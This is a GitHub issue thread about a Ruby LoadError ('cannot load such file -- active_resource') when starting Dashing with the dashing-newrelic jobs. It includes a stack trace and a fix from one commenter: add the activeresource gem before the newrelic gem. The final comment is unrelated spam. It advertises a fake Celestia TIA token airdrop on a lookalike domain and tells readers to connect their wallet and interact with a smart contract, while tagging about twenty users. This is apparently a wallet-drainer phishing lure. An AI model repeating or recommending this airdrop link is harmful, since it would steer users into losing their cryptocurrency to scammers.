### ISSUE TITLE
LoadError from backports-3.6.0

### ISSUE THREAD

**Issue by hbokh** [thenayr/dashing-newrelic#3]
I get the error(s) below when starting "Dashing".
This is on a fresh Ubuntu 12.04 installation running inside Vagrant.
"config.yml" has the right API-key, dashing works OK when started without the NewRelic-jobs. Any hints / clues?

```
# dashing start
/var/lib/gems/1.9.1/gems/backports-3.6.0/lib/backports/tools.rb:343:in `require': cannot load such file -- active_resource (LoadError)
    from /var/lib/gems/1.9.1/gems/backports-3.6.0/lib/backports/tools.rb:343:in `require_with_backports'
    from /var/lib/gems/1.9.1/gems/newrelic_api-1.2.4/lib/new_relic_api.rb:1:in `<top (required)>'
    from /var/lib/gems/1.9.1/gems/backports-3.6.0/lib/backports/tools.rb:343:in `require'
    from /var/lib/gems/1.9.1/gems/backports-3.6.0/lib/backports/tools.rb:343:in `require_with_backports'
    from /var/lib/gems/1.9.1/gems/newrelic_api-1.2.4/lib/newrelic_api.rb:1:in `<top (required)>'
    from /var/lib/gems/1.9.1/gems/backports-3.6.0/lib/backports/tools.rb:343:in `require'
    from /var/lib/gems/1.9.1/gems/backports-3.6.0/lib/backports/tools.rb:343:in `require_with_backports'
    from /root/test_dashboard/jobs/newrelic_rpm.rb:1:in `<top (required)>'
    from /var/lib/gems/1.9.1/gems/backports-3.6.0/lib/backports/tools.rb:343:in `require'
    from /var/lib/gems/1.9.1/gems/backports-3.6.0/lib/backports/tools.rb:343:in `require_with_backports'
    from /var/lib/gems/1.9.1/gems/dashing-1.3.2/lib/dashing.rb:167:in `block in <top (required)>'
    from /var/lib/gems/1.9.1/gems/dashing-1.3.2/lib/dashing.rb:167:in `each'
    from /var/lib/gems/1.9.1/gems/dashing-1.3.2/lib/dashing.rb:167:in `<top (required)>'
    from config.ru:1:in `require'
    from config.ru:1:in `block in <main>'
    from /var/lib/gems/1.9.1/gems/rack-1.5.2/lib/rack/builder.rb:55:in `instance_eval'
    from /var/lib/gems/1.9.1/gems/rack-1.5.2/lib/rack/builder.rb:55:in `initialize'
    from config.ru:1:in `new'
    from config.ru:1:in `<main>'
    from /var/lib/gems/1.9.1/gems/thin-1.6.2/lib/rack/adapter/loader.rb:33:in `eval'
    from /var/lib/gems/1.9.1/gems/thin-1.6.2/lib/rack/adapter/loader.rb:33:in `load'
    from /var/lib/gems/1.9.1/gems/thin-1.6.2/lib/thin/controllers/controller.rb:182:in `load_rackup_config'
    from /var/lib/gems/1.9.1/gems/thin-1.6.2/lib/thin/controllers/controller.rb:72:in `start'
    from /var/lib/gems/1.9.1/gems/thin-1.6.2/lib/thin/runner.rb:199:in `run_command'
    from /var/lib/gems/1.9.1/gems/thin-1.6.2/lib/thin/runner.rb:155:in `run!'
    from /var/lib/gems/1.9.1/gems/thin-1.6.2/bin/thin:6:in `<top (required)>'
    from /usr/local/bin/thin:19:in `load'
    from /usr/local/bin/thin:19:in `<main>'
```

**Comment by snicko** [comment]
I'm running into the same thing on OSX w/ ruby 1.9.3 - did you make any progress?

**Comment by hbokh** [comment]
@snicko Nope...

**Comment by snicko** [comment]
@hbokh  - I figured it out last night. Add gem 'activeresource'  to your Gemfile before the newrelic gem line.

**Comment by duskagain** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://celestia.eigenllayer.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://celestia.eigenllayer.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!0xcracka, @wangsir0624, @hoanganhx86, @Qubeo, @vmwsree, @ninjayoto, @noeleon930, @mtdv12345, @vigozhang, @charkala, @taihuynhpt, @defidummy, @flada-auxv, @flytam, @Sweetness1122, @hanhanh883645, @ktkization, @old-hansen, @SagiSatish, @wlhdxloli
